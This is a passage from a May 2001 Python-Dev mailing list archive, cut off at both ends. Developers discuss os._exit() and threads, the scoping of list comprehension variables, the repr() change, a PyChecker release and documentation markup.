did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads." Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program". In fact, a traceback from the hung "sleep(1)" thread shows (gdb) where #0 0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45 #1 0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934 #2 0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34 #3 0x08067ba0 in PyThread_acquire_lock () at eval.c:41 #4 0x08051ff1 in PyEval_RestoreThread () at eval.c:41 #5 0x40019ef9 in floatsleep () at eval.c:41 #6 0x400193fd in time_sleep () at eval.c:41 [...] While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition. Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any. Jeff From tim.one at home.com Tue May 29 06:03:38 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:03:38 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010528213205.A1236@localhost.localdomain> Message-ID: [Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ] > My reasoning: The documentation for _exit() says it is "used to exit the > child process after a fork()", and my model for thinking about threads > is that they're "child processes, but ...". Thus, invoking os._exit() > in a thread made sense to me, meaning "ask the OS to destroy this thread > now, but leave my file descriptors, etc., alone for the other threads." You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (aee the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it. > Your suggestion in the tracker of writing the equivalent C program is a > good one, though my suspicion (which I did not voice in the SF report) > was that perhaps the thread which called _exit() held the GIL, in which > case it was in some sense Python's fault that execution didn't continue. Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process. But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it. > ... > Of course, if os._exit() has no intended use in a threaded program, Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences. > then this behavior is as good as any. And better than most . From tim.one at home.com Tue May 29 06:16:46 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:16:46 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> Message-ID: [Martin] > I took a special look at METH_OLDARGS occurrences. [GregE] > Shouldn't all these be removed? I would have thought > list.append was the last one! I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args: >>> {}.clear(2) # complains Traceback (most recent call last): File "", line 1, in ? TypeError: function takes no arguments >>> {}.clear(val=12, hohoho=666) # accepts nonsense silently >>> the-more-you-look-the-messier-it-gets-ly y'rs - tim From tim.one at home.com Tue May 29 08:06:19 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:06:19 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org> Message-ID: ESR> Apparently the Universe is an even more random place than I ESR> thought. [Barry A. Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one at home.com Tue May 29 08:15:07 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg at aol.com > -----Original Message----- > From: python-list-admin at python.org > [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list at python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh at python.net Tue May 29 10:00:42 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one at home.com Tue May 29 10:04:48 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas at xs4all.net Tue May 29 11:52:01 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list at python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From akuchlin at mems-exchange.org Tue May 29 16:04:37 2001 From: akuchlin at mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz at rahul.net Tue May 29 17:47:13 2001 From: aahz at rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. from threading import Thread import os class Foo(Thread): def run(self): while 1: pass f = Foo() f.start() os._exit(1) From beazley at cs.uchicago.edu Tue May 29 18:56:09 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Tue, 29 May 2001 11:56:09 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time... First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue: When I write a list comprehension like this: s = [ expr(x) for x in t ] it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error: # Some loop for x in r: ... # bunch of statements ... s = [expr(x) for x in t] ... # Try to do something with x. # ???? What in the hell is wrong with my program ???? ... The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-). Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example: s = [expr(x) for x in t] would get expanded into something roughly like this: s = [ ] for _mangled_x in t: s.append(expr(_mangled_x)) del _mangled_x Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either. Comments? Cheers, Dave From nas at python.ca Tue May 29 19:01:41 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 29 May 2001 10:01:41 -0700 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529100141.B18974@glacier.fnational.com> David Beazley wrote: > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though. Neil From skip at pobox.com Tue May 29 21:03:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Tue, 29 May 2001 14:03:47 -0500 Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd) Message-ID: <15123.62099.473259.545781@beluga.mojam.com> I pass this along in case anyone here has some ideas for Jeff about how to workaround his problems with pyexpat.c. Skip -------------- next part -------------- An embedded message was scrubbed... From: Jeff Rush Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 Size: 3437 URL: From gward at python.net Tue May 29 23:21:55 2001 From: gward at python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics. Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp at ActiveState.com Tue May 29 23:55:03 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim at digicool.com Wed May 30 00:54:01 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From fdrake at cj42289-a.reston1.va.home.com Wed May 30 07:31:01 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for development version of Python (2.2). Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. Please take a look and send comments to doc-sig at python.org; the first page containing these changes is at: http://python.sourceforge.net/devel-docs/ref/identifiers.html The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate. I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definately lagging behind in CSS support! Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes. From tim.one at home.com Wed May 30 07:51:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 01:51:04 -0400 Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: [Fred Drake] > The development version of the documentation has been updated: > > http://python.sourceforge.net/devel-docs/ > > Incremental update for development version of Python (2.2). > > Mostly small updates, but I've worked on new markup for grammar > productions used in the Reference Manual. Currently, only the lexical > productions in Chapter 2 of the manual have been converted to the new > markup and layout. Please take a look and send comments to > doc-sig at python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one. But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake at acm.org Wed May 30 07:53:23 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one at home.com Wed May 30 09:47:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 03:47:47 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley] > ... > However, I've also been shooting myself in the foot a little more > than usual > ... > Because of this, I have frequently found myself debugging the > following programming error: If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one . OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names: >>> [repr(name) for name in globals().keys()] ["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"] >>> Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone: >> globals().keys() '__builtins__', '__name__', 'name', '__doc__'] >> It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest. > ... > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names: >>> class x: ... pass ... >>> [1 for x.i in range(3)] [1, 1, 1] >>> x.i 2 >>> This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this: >>> [i for i in range(2) for i in range(2, 5)] [2, 3, 4, 2, 3, 4] >>> That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"? Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today). > ... > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler? >>> import sys >>> try: ... [i*i for i in xrange(sys.maxint)] ... except OverflowError: ... raise OverflowError("oops! blew up at %d" % i) ... Traceback (most recent call last): File "", line 4, in ? OverflowError: oops! blew up at 46341 >>> Or what about: i = 12 def f(): print i return [i for i in range(i)] f() 1. Should "print i" print 12, or raise UnboundLocalError? 2. Does the "i" in "range(i)" refer to the global i, or is that just senseless? So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new. > I was actually quite surprised with this behavior the first time I saw > it. Me too . > I suspect most other programmers would not anticipate this side > effect either. I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising. Another principled model is possible, where [f(i) for i in whatever] is treated like (lambda: [f(i) for i in whatever])() >>> i = 12 >>> (lambda: [i**2 for i in range(4)])() [0, 1, 4, 9] >>> i 12 >>> That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us . From esr at thyrsus.com Wed May 30 10:00:56 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." -- Supreme Court Justice Louis Brandeis From thomas at xs4all.net Wed May 30 13:14:24 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack at oratrix.nl Wed May 30 14:26:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley at cs.uchicago.edu Wed May 30 15:49:29 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this: a = [2*x for x in s] + [3*x for x in t] I certainly don't conceptualize it as being literally expanded into the following sequence of statements: t1 = [ ] for x in s: t1.append(2*x) t2 = [ ] for x in t: t2.append(3*x) a = t1 + t2 > > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 > >>> > Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner? > > ... > > Just as an aside, I have never intentionally used the iterator > > variable of a list comprehension after the operation has completed. > > Not even in a debugger, when the operation has completed via unexpected > exception, and you're desperate to know what the control vrbl was bound to > at the time of death? Or in an exception handler? > Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-). > Another principled model is possible, where > > [f(i) for i in whatever] > > is treated like > > (lambda: [f(i) for i in whatever])() > > >>> i = 12 > >>> (lambda: [i**2 for i in range(4)])() > [0, 1, 4, 9] > >>> i > 12 > >>> > > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected went I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this: a = (lambda s: [2*i for i in s])(s) However, that's pretty ugly. In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example: a = [_i*2 for _i in t] (although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this). Cheers, Dave From fdrake at acm.org Wed May 30 16:03:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> David Beazley writes: > Maybe everyone else views list comprehensions as a series of > statements (the syntactic sugar for nested for-loop idea). However, I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable. If I see code like this: x = 42 L = 